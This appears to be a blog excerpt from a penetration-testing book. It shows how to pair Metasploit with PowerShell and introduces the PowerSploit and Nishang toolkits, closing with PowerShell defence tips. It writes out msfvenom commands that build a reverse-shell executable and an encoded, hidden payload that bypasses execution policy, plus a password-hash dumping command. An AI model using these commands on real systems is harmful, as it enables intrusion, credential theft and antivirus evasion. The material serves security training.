4 min read

PowerShell is a perfect tool for performing sophisticated attacks, and also, can be used side-by-side with the Metasploit Framework.

This article is an excerpt taken from the book Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN.

In today’s post, we will combine the flexibility of Metasploit and PowerShell. This combination is a great opportunity to perform more customized attacks and security tests.

Interactive PowerShell

PowerShell attacks are already integrated into Metasploit. You can check by using the search command:

msf> search powershell

Now it is time to learn how to use Metasploit with PowerShell. For a demonstration of one of the many uses, you can convert a PowerShell script into an executable file using the msfvenom utility:

>msfvenom    -p    windows/powershell_reverse_tcp LHOST=192.168.1.39    LPORT=4444    -f    exe    >    evilPS.exe
>msfvenom  -p     windows/exec     CMD=“powershell     -ep     bypass     -W     Hidden     -enc   [Powershell script Here]”    -f    exe    -e    x86/shikata_ga_nai    -o   /root/home/ghost/Desktop/power.exe

PowerSploit

PowerSploit is an amazing set of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, you need to grab it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit:

# git clone https://github.com/PowerShellMafia/PowerSploit

After cloning the project, use the ls command to list the files:

From the following screenshot, you can note that PowerSploit contains a lot of amazing scripts for performing a number of tasks, such as:

  • AntivirusBypass
  • Exfiltration
  • Persistence
  • PowerSploit
  • PowerUp
  • PowerView

Nishang – PowerShell for penetration testing

Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang:

# git clone https://github.com/samratashok/nishang

As you can see from listing the downloaded project, Nishang is loaded with many various scripts and utilities for performing a lot of required tasks during penetration testing missions, such as:

  • Privilege escalation
  • Scanning
  • Pivoting  

You can explore all the available scripts by listing the content of Nishang project using the ls command:

Let’s explore some of Nishang’s script power on a Windows machine:

You can import all the modules using the Import-Module PowerShell cmdlet:

Oops, something went wrong! Don’t worry, in order to use the Import-Module, you need to open PowerShell as an administrator, and type  Set-ExecutionPolicy -ExecutionPolicy RemoteSigned:

Then you can import the modules:

Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information:

If you want  to unveil WLAN keys, type Get-WLAN-Keys:

You can go further and dump password hashes from a target machine in a post-exploitation mission. Thanks to the Get-PassHashes module, you are able to dump password hashes. This is the output of it from my local machine:

However, if you want to pop the command after getting a shell, use:

Powershell.exe –exec bypass –Command “& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1' , Get-PassHashes}”

You can even perform a phishing attack using Invoke-CredentialPhish, like in the previous demonstration. You can run this attack on the victim’s machine:

Defending against PowerShell attacks

In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to:

  1. Implement the latest PowerShell version (version 5, when this book was written). To check, type Get-Host:

  1. Monitor PowerShell logs.
  2. Ensure a least-privilege policy and group policies settings. You can edit them with the Local Group Policy Editor. If you are using the Windows 10 Enterprise edition, you can also use AppLocker:

  1. Use the Constrained Language mode:
PS C:Windowssystem32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
  1. To check the Constrained Language mode, type:
 $ExecutionContext.SessionState.LanguageMode
  1. That way, malicious scripts won’t work:

Thus, in this article, we saw the combination of Metasploit and PowerShell to perform more customized attacks and security tests. If you’ve enjoyed reading this post, and want to learn how to exploit enterprise VLANS, and go from theory to real-world experience, do check out Advanced Infrastructure Penetration Testing.

Read Next

Pentest tool in focus: Metasploit

Approaching a Penetration Test Using Metasploit

Getting Started with Metasploitable2 and Kali Linux

Savia Lobo
A Data science fanatic. Loves to be updated with the tech happenings around the globe. Loves singing and composing songs. Believes in putting the art in smart.